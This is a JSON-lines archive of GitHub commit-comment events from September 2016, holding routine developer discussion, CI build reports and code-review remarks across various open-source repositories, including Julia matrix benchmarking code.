{"id":"4545108483","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/IJulia.jl"},"payload":{"comment":{"id":18975805,"position":null,"line":null,"path":null,"commit_id":"df0eec2e009f5f3cb873375fd1c2c69870ab725c","created_at":"2016-09-11T02:44:10Z","updated_at":"2016-09-11T02:44:10Z","body":"could you do this in pycall too?"}},"created_at":"2016-09-11T02:44:10Z"}
{"id":"4545108592","type":"CommitCommentEvent","actor":{"login":"tseemann"},"repo":{"name":"ekg/freebayes"},"payload":{"comment":{"id":18975807,"position":null,"line":null,"path":null,"commit_id":"4d700a986bf835c47792b54d31b8876e7e4a7df5","created_at":"2016-09-11T02:44:17Z","updated_at":"2016-09-11T02:44:17Z","body":"Is this bug related to the `-C` option?"}},"created_at":"2016-09-11T02:44:17Z"}
{"id":"4545108757","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975808,"position":null,"line":null,"path":null,"commit_id":"50eb42de69d2e3c133c34e82b2acaeb5b8a8a791","created_at":"2016-09-11T02:44:26Z","updated_at":"2016-09-11T02:44:26Z","body":"fix_gcc48_ICE (Unknown) - Win64-Windows-7-VisualStudio-12: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-50eb42de69d2e3c133c34e82b2acaeb5b8a8a791-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-11T02:44:26Z"}
{"id":"4545108761","type":"CommitCommentEvent","actor":{"login":"otofune"},"repo":{"name":"syuilo/misskey-web"},"payload":{"comment":{"id":18975809,"position":null,"line":null,"path":null,"commit_id":"b1d3f9c4925e176d62f2b97f299e6f076088ac31","created_at":"2016-09-11T02:44:26Z","updated_at":"2016-09-11T02:44:26Z","body":"```\r\nproxy:\r\n    enable: true\r\n    https: true\r\n```\r\nとか？"}},"created_at":"2016-09-11T02:44:26Z"}
{"id":"4545109926","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975811,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:45:37Z","updated_at":"2016-09-11T02:45:37Z","body":"... or ```export ANDROID_JACK_VM_ARGS=\"-Xmx4g -Dfile.encoding=UTF-8 -XX:+TieredCompilation\"```"}},"created_at":"2016-09-11T02:45:37Z"}
{"id":"4545112337","type":"CommitCommentEvent","actor":{"login":"clarkms101"},"repo":{"name":"clarkms101/JQuery_Roket"},"payload":{"comment":{"id":18975816,"position":null,"line":null,"path":null,"commit_id":"b5653379419d51d1c028a2983d8739464bce969f","created_at":"2016-09-11T02:47:59Z","updated_at":"2016-09-11T02:47:59Z","body":"定位調整"}},"created_at":"2016-09-11T02:47:59Z"}
{"id":"4545112437","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975817,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:48:07Z","updated_at":"2016-09-11T02:48:07Z","body":"@ngoquang2708 \r\nBro, do you know where's this libqdMetaData?"}},"created_at":"2016-09-11T02:48:07Z"}
{"id":"4545113185","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975819,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:48:51Z","updated_at":"2016-09-11T02:48:51Z","body":"My friend planned to build AOSP 7.0 but missing that lib"}},"created_at":"2016-09-11T02:48:51Z"}
{"id":"4545113654","type":"CommitCommentEvent","actor":{"login":"narayana-java"},"repo":{"name":"narayana-java/Hello-Narayana"},"payload":{"comment":{"id":18975820,"position":null,"line":null,"path":null,"commit_id":"4ba99c8dc4bfa7135bb73facd8050362b699aab5","created_at":"2016-09-11T02:49:17Z","updated_at":"2016-09-11T02:49:17Z","body":"No comment"}},"created_at":"2016-09-11T02:49:17Z"}
{"id":"4545113789","type":"CommitCommentEvent","actor":{"login":"ngoquang2708"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975821,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:49:25Z","updated_at":"2016-09-11T02:49:25Z","body":"Google my dude https://android.googlesource.com/platform/hardware/qcom/display/+/jb-mr2-release/libqdutils/Android.mk."}},"created_at":"2016-09-11T02:49:25Z"}
{"id":"4545114078","type":"CommitCommentEvent","actor":{"login":"jhancock1975"},"repo":{"name":"jhancock1975/book"},"payload":{"comment":{"id":18975822,"position":null,"line":null,"path":null,"commit_id":"ec7f94ecf4a970b2ef4d6fc45b972817569af8dd","created_at":"2016-09-11T02:49:42Z","updated_at":"2016-09-11T02:49:42Z","body":"much better"}},"created_at":"2016-09-11T02:49:42Z"}
{"id":"4545114139","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":18975823,"position":57,"line":238,"path":"android/src/com/frostwire/android/util/SystemUtils.java","commit_id":"83929d9e77152739a49d713bda1d32921987d87a","created_at":"2016-09-11T02:49:46Z","updated_at":"2016-09-11T02:49:46Z","body":"oh didnt think there would be an issue getting a hold of the ActivityManager to ask about your own services, will add."}},"created_at":"2016-09-11T02:49:46Z"}
{"id":"4545114621","type":"CommitCommentEvent","actor":{"login":"koquantam"},"repo":{"name":"ngoquang2708/android_device_samsung_vivalto3gvn"},"payload":{"comment":{"id":18975824,"position":null,"line":null,"path":null,"commit_id":"8eabec87d135b7bcf77f867c5ed430da55d75295","created_at":"2016-09-11T02:50:15Z","updated_at":"2016-09-11T02:50:15Z","body":"Thanks"}},"created_at":"2016-09-11T02:50:15Z"}
{"id":"4545115989","type":"CommitCommentEvent","actor":{"login":"kashike"},"repo":{"name":"PaperMC/Paper"},"payload":{"comment":{"id":18975827,"position":null,"line":null,"path":null,"commit_id":"c02c01b2c531384dfe8f2d1d721113bada4892cb","created_at":"2016-09-11T02:51:47Z","updated_at":"2016-09-11T02:51:47Z","body":"@Zbob750 ![w](https://pbs.twimg.com/profile_images/1564777558/logo.png)"}},"created_at":"2016-09-11T02:51:47Z"}
{"id":"4545116481","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975828,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T02:52:23Z","updated_at":"2016-09-11T02:52:23Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-MacOS-10.9-clang: OK (2328 of 2328 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-11T02:52:23Z"}
{"id":"4545116669","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975829,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T02:52:34Z","updated_at":"2016-09-11T02:52:34Z","body":"I copied that line from the *.pot file. https://github.com/wpninjas/ninja-forms/blob/master/lang/ninja-forms.pot#L2481"}},"created_at":"2016-09-11T02:52:34Z"}
{"id":"4545116701","type":"CommitCommentEvent","actor":{"login":"GusMaGuz"},"repo":{"name":"GusMaGuz/hello-word"},"payload":{"comment":{"id":18975830,"position":null,"line":null,"path":null,"commit_id":"33fa08366017b9e549e366646589a1ea01975872","created_at":"2016-09-11T02:52:37Z","updated_at":"2016-09-11T02:52:37Z","body":"hola mundo"}},"created_at":"2016-09-11T02:52:37Z"}
{"id":"4545117581","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975833,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T02:53:33Z","updated_at":"2016-09-11T02:53:33Z","body":"Looks like it is in there both ways:\r\n\r\n- https://github.com/wpninjas/ninja-forms/blob/master/lang/ninja-forms.pot#L2481\r\n- https://github.com/wpninjas/ninja-forms/blob/master/lang/ninja-forms.pot#L27"}},"created_at":"2016-09-11T02:53:33Z"}
{"id":"4545117716","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18975834,"position":null,"line":null,"path":null,"commit_id":"57127b7bfffa174f2de8d92e19d8d6865529eae1","created_at":"2016-09-11T02:53:41Z","updated_at":"2016-09-11T02:53:41Z","body":"fix_gcc48_ICE (mbadams5) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-57127b7bfffa174f2de8d92e19d8d6865529eae1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-11T02:53:41Z"}
{"id":"4545117780","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18975835,"position":null,"line":null,"path":null,"commit_id":"59cb3b4fa1dc1b9679a50ca54214301b67d679b6","created_at":"2016-09-11T02:53:47Z","updated_at":"2016-09-11T02:53:47Z","body":"I don't like having Darwin or WINNT in the name, not obvious for users. We should maybe rename osx to macos now. and potentially try to normalize nightly vs release naming conventions a bit, though potentially a lot of scripts would need updating for any change."}},"created_at":"2016-09-11T02:53:47Z"}
{"id":"4545118262","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975837,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T02:54:16Z","updated_at":"2016-09-11T02:54:16Z","body":"@fjarrett Looks like it is in there both ways:\r\n\r\n- https://github.com/wpninjas/ninja-forms/blob/master/lang/ninja-forms.pot#L2481\r\n- https://github.com/wpninjas/ninja-forms/blob/master/lang/ninja-forms.pot#L27"}},"created_at":"2016-09-11T02:54:16Z"}
{"id":"4545118912","type":"CommitCommentEvent","actor":{"login":"anthrotype"},"repo":{"name":"trufont/trufont"},"payload":{"comment":{"id":18975838,"position":null,"line":null,"path":null,"commit_id":"457111e6d1402acc7fe4842736e89ebc44744eef","created_at":"2016-09-11T02:54:55Z","updated_at":"2016-09-11T02:54:55Z","body":"@adrientetar sorry I didn't mean to push to master, I wanted to send a PR but I was using the Github web interface and I clicked the wrong button... 😁 "}},"created_at":"2016-09-11T02:54:55Z"}
{"id":"4545119521","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975840,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T02:55:30Z","updated_at":"2016-09-11T02:55:30Z","body":"Ah, one has the `*` wrapped with `%s` markers, which allow for styling the `*` red."}},"created_at":"2016-09-11T02:55:30Z"}
{"id":"4545120491","type":"CommitCommentEvent","actor":{"login":"prashantkhurana"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18975842,"position":4,"line":52,"path":"app/src/main/AndroidManifest.xml","commit_id":"e0f734459ef5140263a715060c2a36a154d2dc44","created_at":"2016-09-11T02:56:35Z","updated_at":"2016-09-11T02:56:35Z","body":"hey @ccrama what was the scrolling bug that this fixes? Now go to subreddit doesn't work. Nothing happens on typing. reverting this fixes that. "}},"created_at":"2016-09-11T02:56:35Z"}
{"id":"4545121905","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18975843,"position":4,"line":52,"path":"app/src/main/AndroidManifest.xml","commit_id":"e0f734459ef5140263a715060c2a36a154d2dc44","created_at":"2016-09-11T02:58:04Z","updated_at":"2016-09-11T02:58:04Z","body":"Its working for me either way. Try changing the MainActivity keyboard mode\nto adjustPan instead of adjustResize\n\nOn Sep 10, 2016 9:56 PM, \"Prashant Khurana\" <notifications@github.com>\nwrote:\n\n> hey @ccrama <https://github.com/ccrama> what was the scrolling bug that\n> this fixes? Now go to subreddit doesn't work. Nothing happens on typing.\n> reverting this fixes that.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/ccrama/Slide/commit/e0f734459ef5140263a715060c2a36a154d2dc44#commitcomment-18975842>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ADpJRDNsYGPVWbzJ9cUbGdPKERmx2L1Aks5qo23lgaJpZM4J541F>\n> .\n>\n"}},"created_at":"2016-09-11T02:58:04Z"}
{"id":"4545122043","type":"CommitCommentEvent","actor":{"login":"kjohnson"},"repo":{"name":"wpninjas/ninja-forms"},"payload":{"comment":{"id":18975845,"position":6,"line":19,"path":"includes/Config/i18nFrontEnd.php","commit_id":"a1b780981ed74ee5d8863923fa39cc6ebce0ecb8","created_at":"2016-09-11T02:58:13Z","updated_at":"2016-09-11T02:58:13Z","body":"Created an issue: https://github.com/wpninjas/ninja-forms/issues/1749"}},"created_at":"2016-09-11T02:58:13Z"}
{"id":"4545122675","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"haskell/cabal"},"payload":{"comment":{"id":18975846,"position":29,"line":212,"path":"Cabal/Distribution/Simple/GHCJS.hs","commit_id":"e7d2a62c84d71ca565d9af1f4d063330ea48da5f","created_at":"2016-09-11T02:58:57Z","updated_at":"2016-09-11T02:58:57Z","body":"@ttuegel  BTW, shouldn't you have deleted the one in `GHC.Internal` as well?"}},"created_at":"2016-09-11T02:58:57Z"}
{"id":"4546416386","type":"CommitCommentEvent","actor":{"login":"corphish"},"repo":{"name":"ngoquang2708/android_kernel_samsung_vivalto3gvn"},"payload":{"comment":{"id":18977926,"position":null,"line":null,"path":null,"commit_id":"cbf4ef253998d99e2c3d38edccc45d2596a23c2b","created_at":"2016-09-11T20:00:00Z","updated_at":"2016-09-11T20:00:00Z","body":"It really works?\r\nThen it would be a terrific solution to the hack"}},"created_at":"2016-09-11T20:00:00Z"}
{"id":"4546419854","type":"CommitCommentEvent","actor":{"login":"zmwangx"},"repo":{"name":"jarun/Buku"},"payload":{"comment":{"id":18977927,"position":null,"line":null,"path":null,"commit_id":"b90679aab7ae1ae2ee54353c5a1ba89469e5d79a","created_at":"2016-09-11T20:02:10Z","updated_at":"2016-09-11T20:02:10Z","body":"Merged."}},"created_at":"2016-09-11T20:02:10Z"}
{"id":"4546420188","type":"CommitCommentEvent","actor":{"login":"panlanfeng"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977929,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T20:02:22Z","updated_at":"2016-09-11T20:02:22Z","body":"In R, the following works.\r\n```R\r\nmatrix(1:4, 4, 4)\r\n```\r\nActually I ocassionly find myself in the situation when `x` is a shorter vector."}},"created_at":"2016-09-11T20:02:22Z"}
{"id":"4546420777","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977930,"position":39,"line":35,"path":"app/index.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:02:42Z","updated_at":"2016-09-11T20:02:42Z","body":"Зачем все эти строки выше `$http.put`? Они, кажется, и не используются совсем."}},"created_at":"2016-09-11T20:02:42Z"}
{"id":"4546420912","type":"CommitCommentEvent","actor":{"login":"coddingtonbear"},"repo":{"name":"coddingtonbear/django-measurement"},"payload":{"comment":{"id":18977931,"position":4,"line":23,"path":".travis.yml","commit_id":"96ea1c1a4b96426bf40303c461e91e52ae293f79","created_at":"2016-09-11T20:02:46Z","updated_at":"2016-09-11T20:02:46Z","body":"Oh, shoot; you're right!  Sorry for jumping to unreasonable conclusions here."}},"created_at":"2016-09-11T20:02:46Z"}
{"id":"4546421786","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977932,"position":39,"line":35,"path":"app/index.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:03:09Z","updated_at":"2016-09-11T20:03:09Z","body":"$http.put должен быть в сервисе"}},"created_at":"2016-09-11T20:03:09Z"}
{"id":"4546423049","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977935,"position":72,"line":63,"path":"app/index.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:03:57Z","updated_at":"2016-09-11T20:03:57Z","body":"`$scope.items` или что-то вроде того."}},"created_at":"2016-09-11T20:03:57Z"}
{"id":"4546423957","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977936,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T20:04:32Z","updated_at":"2016-09-11T20:04:32Z","body":"OK, I'll implement this."}},"created_at":"2016-09-11T20:04:32Z"}
{"id":"4546424166","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977937,"position":89,"line":127,"path":"app/index.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:04:41Z","updated_at":"2016-09-11T20:04:41Z","body":"Переменная, в принципе, не нужна.\r\n`if (confirm(\"Are you sure you want to delete the selected item?\")) { ... }`"}},"created_at":"2016-09-11T20:04:41Z"}
{"id":"4546425109","type":"CommitCommentEvent","actor":{"login":"trusktr"},"repo":{"name":"WebReflection/document-register-element"},"payload":{"comment":{"id":18977938,"position":847,"line":1167,"path":"build/document-register-element.max.amd.js","commit_id":"e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0","created_at":"2016-09-11T20:05:19Z","updated_at":"2016-09-11T20:05:19Z","body":"Why does `customElements.whenDefined` race itself? Just curious."}},"created_at":"2016-09-11T20:05:19Z"}
{"id":"4546425702","type":"CommitCommentEvent","actor":{"login":"CheezItMan"},"repo":{"name":"Ada-Developers-Academy/textbook-curriculum"},"payload":{"comment":{"id":18977939,"position":100,"line":95,"path":"05-html-css/03-css-intro.md","commit_id":"ad583963a85f7a9b5cec4cbf6d3ba49939f5f846","created_at":"2016-09-11T20:05:42Z","updated_at":"2016-09-11T20:05:42Z","body":"@PilgrimMemoirs Typo?"}},"created_at":"2016-09-11T20:05:42Z"}
{"id":"4546425821","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977940,"position":1,"line":1,"path":"db - копия.json","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:05:47Z","updated_at":"2016-09-11T20:05:47Z","body":"Файл не нужен, похоже."}},"created_at":"2016-09-11T20:05:47Z"}
{"id":"4546426138","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/document-register-element"},"payload":{"comment":{"id":18977941,"position":847,"line":1167,"path":"build/document-register-element.max.amd.js","commit_id":"e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0","created_at":"2016-09-11T20:05:59Z","updated_at":"2016-09-11T20:05:59Z","body":"What?\n\nOn Sunday, 11 September 2016, Joseph Orbegoso Pea <notifications@github.com>\nwrote:\n\n> Why does customElements.whenDefined race itself? Just curious.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/WebReflection/document-register-element/commit/e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0#commitcomment-18977938>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAFO9SeRSlkeSMVe5P1XDdGH6swX2xBYks5qpF7_gaJpZM4J6F1G>\n> .\n>\n"}},"created_at":"2016-09-11T20:05:59Z"}
{"id":"4546426388","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977943,"position":111,"line":111,"path":"app/indexold.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:06:12Z","updated_at":"2016-09-11T20:06:12Z","body":"Здесь нужно будет дозапрашивать с сервера."}},"created_at":"2016-09-11T20:06:12Z"}
{"id":"4546427781","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/angular-final-project"},"payload":{"comment":{"id":18977945,"position":20,"line":18,"path":"app/index.js","commit_id":"bd49e0adcc5d0ebaa52249f3988e9ace43c929aa","created_at":"2016-09-11T20:07:10Z","updated_at":"2016-09-11T20:07:10Z","body":"`$http.post` должен быть в сервисе."}},"created_at":"2016-09-11T20:07:10Z"}
{"id":"4546430127","type":"CommitCommentEvent","actor":{"login":"WebReflection"},"repo":{"name":"WebReflection/document-register-element"},"payload":{"comment":{"id":18977948,"position":847,"line":1167,"path":"build/document-register-element.max.amd.js","commit_id":"e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0","created_at":"2016-09-11T20:08:34Z","updated_at":"2016-09-11T20:08:34Z","body":"It doesn't race itself. If natively defined in hybrid polyfilled browsers\nsuch WebKit uses the native one, otherwise uses the polyfilled one. I can't\naccess all possible natively defined components so whoever comes first is\nthe defined one to use\n\nOn Sunday, 11 September 2016, Andrea Giammarchi <andrea.giammarchi@gmail.com>\nwrote:\n\n> What?\n>\n> On Sunday, 11 September 2016, Joseph Orbegoso Pea <\n> notifications@github.com\n> <javascript:_e(%7B%7D,'cvml','notifications@github.com');>> wrote:\n>\n>> Why does customElements.whenDefined race itself? Just curious.\n>>\n>> —\n>> You are receiving this because you authored the thread.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/WebReflection/document-register-element/commit/e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0#commitcomment-18977938>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AAFO9SeRSlkeSMVe5P1XDdGH6swX2xBYks5qpF7_gaJpZM4J6F1G>\n>> .\n>>\n>\n"}},"created_at":"2016-09-11T20:08:34Z"}
{"id":"4546432040","type":"CommitCommentEvent","actor":{"login":"trusktr"},"repo":{"name":"WebReflection/document-register-element"},"payload":{"comment":{"id":18977951,"position":847,"line":1167,"path":"build/document-register-element.max.amd.js","commit_id":"e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0","created_at":"2016-09-11T20:09:50Z","updated_at":"2016-09-11T20:09:50Z","body":"Here, `customElements.whenDefined` is defined, and inside this definition we see `Promise.race(customElements.whenDefined, ...)`, so was curious to know why."}},"created_at":"2016-09-11T20:09:50Z"}
{"id":"4546433343","type":"CommitCommentEvent","actor":{"login":"trusktr"},"repo":{"name":"WebReflection/document-register-element"},"payload":{"comment":{"id":18977952,"position":847,"line":1167,"path":"build/document-register-element.max.amd.js","commit_id":"e47f77b5fa49d97b1c29c34fb1b7815b2baa68d0","created_at":"2016-09-11T20:10:34Z","updated_at":"2016-09-11T20:10:34Z","body":"It may make more sense if you open in GitHub, as email doesn't show the code."}},"created_at":"2016-09-11T20:10:34Z"}
{"id":"4546435379","type":"CommitCommentEvent","actor":{"login":"devoncarew"},"repo":{"name":"Dart-Code/Dart-Code"},"payload":{"comment":{"id":18977954,"position":null,"line":null,"path":null,"commit_id":"95a78c9f7251d4bbec7e60f181998f0881753919","created_at":"2016-09-11T20:11:51Z","updated_at":"2016-09-11T20:11:51Z","body":"👍 "}},"created_at":"2016-09-11T20:11:51Z"}
{"id":"4546436262","type":"CommitCommentEvent","actor":{"login":"denofevil"},"repo":{"name":"ruby-debug/ruby-debug-ide"},"payload":{"comment":{"id":18977956,"position":5,"line":9,"path":"bin/gdb_wrapper","commit_id":"cede1279387a54c42002b5a5eb623173f29baaf8","created_at":"2016-09-11T20:12:23Z","updated_at":"2016-09-11T20:12:23Z","body":"Yes, I think it's better to pass them to the constructor. I understand having another code that uses same variables in this script is very unlikely, but it's cleaner"}},"created_at":"2016-09-11T20:12:23Z"}
{"id":"4546437912","type":"CommitCommentEvent","actor":{"login":"rperce"},"repo":{"name":"rperce/vim-css-color"},"payload":{"comment":{"id":18977959,"position":null,"line":null,"path":null,"commit_id":"d2c633536adfbb175607ac8c975c8c916d0677a0","created_at":"2016-09-11T20:13:26Z","updated_at":"2016-09-11T20:13:26Z","body":"Oh, yeah, duh"}},"created_at":"2016-09-11T20:13:26Z"}
{"id":"4546438669","type":"CommitCommentEvent","actor":{"login":"edwardsmit"},"repo":{"name":"blueyed/neomake"},"payload":{"comment":{"id":18977961,"position":null,"line":null,"path":null,"commit_id":"8226a2860eaa5353ff77e924225dbd7b8c750093","created_at":"2016-09-11T20:13:57Z","updated_at":"2016-09-11T20:13:57Z","body":"Thanks @blueyed!"}},"created_at":"2016-09-11T20:13:57Z"}
{"id":"4546443557","type":"CommitCommentEvent","actor":{"login":"reagentoo"},"repo":{"name":"reagentoo/gentoo-overlay"},"payload":{"comment":{"id":18977969,"position":null,"line":null,"path":null,"commit_id":"7c26fe65704af197d6ff984683933ead243dccb6","created_at":"2016-09-11T20:17:08Z","updated_at":"2016-09-11T20:17:08Z","body":"Thank you! Unnecessary dependencies was droped."}},"created_at":"2016-09-11T20:17:08Z"}
{"id":"4546444202","type":"CommitCommentEvent","actor":{"login":"nixololo"},"repo":{"name":"CeQadrat/ColdFilmSerialProvider"},"payload":{"comment":{"id":18977970,"position":5,"line":13,"path":"package.json","commit_id":"6581672a2789350cf648bd76a54cf15a4aba0119","created_at":"2016-09-11T20:17:35Z","updated_at":"2016-09-11T20:17:35Z","body":"you probably forgot to use `npm shrinkwrap`\r\nfix it please :)"}},"created_at":"2016-09-11T20:17:35Z"}
{"id":"4546444440","type":"CommitCommentEvent","actor":{"login":"jjskuld"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18977972,"position":null,"line":null,"path":null,"commit_id":"ec361a623e457b4d64a06f637309f0204ad20984","created_at":"2016-09-11T20:17:45Z","updated_at":"2016-09-11T20:17:45Z","body":"Please test this out and see if it's stable before we push out a new release."}},"created_at":"2016-09-11T20:17:45Z"}
{"id":"4546444481","type":"CommitCommentEvent","actor":{"login":"mingsnu"},"repo":{"name":"panlanfeng/RFlavor.jl"},"payload":{"comment":{"id":18977973,"position":32,"line":32,"path":"src/matrix.jl","commit_id":"4837967d0cbd9241880062ddddd0afe5717e7e23","created_at":"2016-09-11T20:17:47Z","updated_at":"2016-09-11T20:17:47Z","body":"Well, I did the test again with large matrix, still can't beat the transposed version. I'll think about other ways of doing this when I got time.\r\n```\r\nfunction matrix(x::AbstractVector, nrow::Integer, ncol::Integer, byrow::Bool = false)\r\n    length(x) % nrow == 0 && length(x) == nrow*ncol || throw(DimensionMismatch(\"Lenth of `x` is not a multiple of `nrow` and `ncol`.\"))\r\n    if byrow\r\n        return reshape(float(x), (Int(nrow), Int(ncol)))'\r\n    else\r\n        return reshape(float(x), (Int(nrow), Int(ncol)))\r\n    end\r\nend\r\n\r\nfunction matrix1(x::AbstractVector, nrow::Integer, ncol::Integer, byrow::Bool = false)\r\n    length(x) % nrow == 0 && length(x) == nrow*ncol || throw(DimensionMismatch(\"Lenth of `x` is not a multiple of `nrow` and `ncol`.\"))\r\n    res=Array(eltype(x), nrow, ncol)\r\n    nx = length(x)\r\n    if byrow\r\n        for j in 1:ncol\r\n            for i in 1:nrow\r\n                ind = ncol*(i-1)+j\r\n                ix = mod1(ind, nx)\r\n                res[i,j]= x[ ix ]\r\n            end\r\n        end\r\n    else\r\n        for j in 1:ncol\r\n            for i in 1:nrow\r\n                ind = nrow*(j-1)+i\r\n                ix = mod1(ind, nx)\r\n                res[i,j]= x[ ix ]\r\n            end\r\n        end\r\n    end\r\n    res\r\nend\r\n\r\nx = rand(10000000);\r\n@time matrix(x, 10000, 1000, true)\r\n@time matrix1(x, 10000, 1000, true)\r\n```\r\n"}},"created_at":"2016-09-11T20:17:47Z"}
